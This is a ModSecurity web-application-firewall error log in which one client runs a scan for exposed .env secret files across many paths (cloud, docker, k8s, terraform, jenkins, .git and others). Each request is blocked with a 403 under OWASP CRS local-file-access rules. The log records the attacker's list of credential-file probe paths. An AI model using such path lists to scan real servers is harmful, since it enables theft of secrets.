[Mon May 11 17:36:30.170266 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agH3flV4kyjgo4bQBUhutQAAANM"]
[Mon May 11 17:36:30.170494 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agH3flV4kyjgo4bQBUhutQAAANM"]
[Mon May 11 17:36:30.170756 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cloud/.env"] [unique_id "agH3flV4kyjgo4bQBUhutQAAANM"]
[Mon May 11 17:36:30.402441 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agH3flV4kyjgo4bQBUhutwAAANM"]
[Mon May 11 17:36:30.402699 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agH3flV4kyjgo4bQBUhutwAAANM"]
[Mon May 11 17:36:30.403050 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/infrastructure/.env"] [unique_id "agH3flV4kyjgo4bQBUhutwAAANM"]
[Mon May 11 17:36:30.617579 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agH3flV4kyjgo4bQBUhuuQAAANM"]
[Mon May 11 17:36:30.617808 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agH3flV4kyjgo4bQBUhuuQAAANM"]
[Mon May 11 17:36:30.618064 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/docker/.env"] [unique_id "agH3flV4kyjgo4bQBUhuuQAAANM"]
[Mon May 11 17:36:30.868102 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agH3flV4kyjgo4bQBUhuugAAANM"]
[Mon May 11 17:36:30.868351 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agH3flV4kyjgo4bQBUhuugAAANM"]
[Mon May 11 17:36:30.868606 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/k8s/.env"] [unique_id "agH3flV4kyjgo4bQBUhuugAAANM"]
[Mon May 11 17:36:31.279346 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvAAAANM"]
[Mon May 11 17:36:31.279570 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvAAAANM"]
[Mon May 11 17:36:31.279820 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/kubernetes/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvAAAANM"]
[Mon May 11 17:36:31.490989 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvQAAANM"]
[Mon May 11 17:36:31.491234 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvQAAANM"]
[Mon May 11 17:36:31.491493 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/terraform/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvQAAANM"]
[Mon May 11 17:36:31.733884 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvgAAANM"]
[Mon May 11 17:36:31.734110 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvgAAANM"]
[Mon May 11 17:36:31.734373 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ansible/.env"] [unique_id "agH3f1V4kyjgo4bQBUhuvgAAANM"]
[Mon May 11 17:36:32.028894 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuvwAAANM"]
[Mon May 11 17:36:32.029117 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuvwAAANM"]
[Mon May 11 17:36:32.029391 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuvwAAANM"]
[Mon May 11 17:36:32.220632 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwAAAANM"]
[Mon May 11 17:36:32.220872 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwAAAANM"]
[Mon May 11 17:36:32.221138 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ci/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwAAAANM"]
[Mon May 11 17:36:32.473396 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwQAAANM"]
[Mon May 11 17:36:32.473636 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwQAAANM"]
[Mon May 11 17:36:32.473910 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cd/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwQAAANM"]
[Mon May 11 17:36:32.710512 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwgAAANM"]
[Mon May 11 17:36:32.710738 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwgAAANM"]
[Mon May 11 17:36:32.710994 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/jenkins/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuwgAAANM"]
[Mon May 11 17:36:32.995756 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuxAAAANM"]
[Mon May 11 17:36:32.995981 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuxAAAANM"]
[Mon May 11 17:36:32.996248 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gitlab/.env"] [unique_id "agH3gFV4kyjgo4bQBUhuxAAAANM"]
[Mon May 11 17:36:33.197892 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxQAAANM"]
[Mon May 11 17:36:33.198129 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxQAAANM"]
[Mon May 11 17:36:33.198390 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/github/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxQAAANM"]
[Mon May 11 17:36:33.417387 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/actions/.env"] [unique_id "agH3gVV4kyjgo4bQBUhuxwAAANM"]
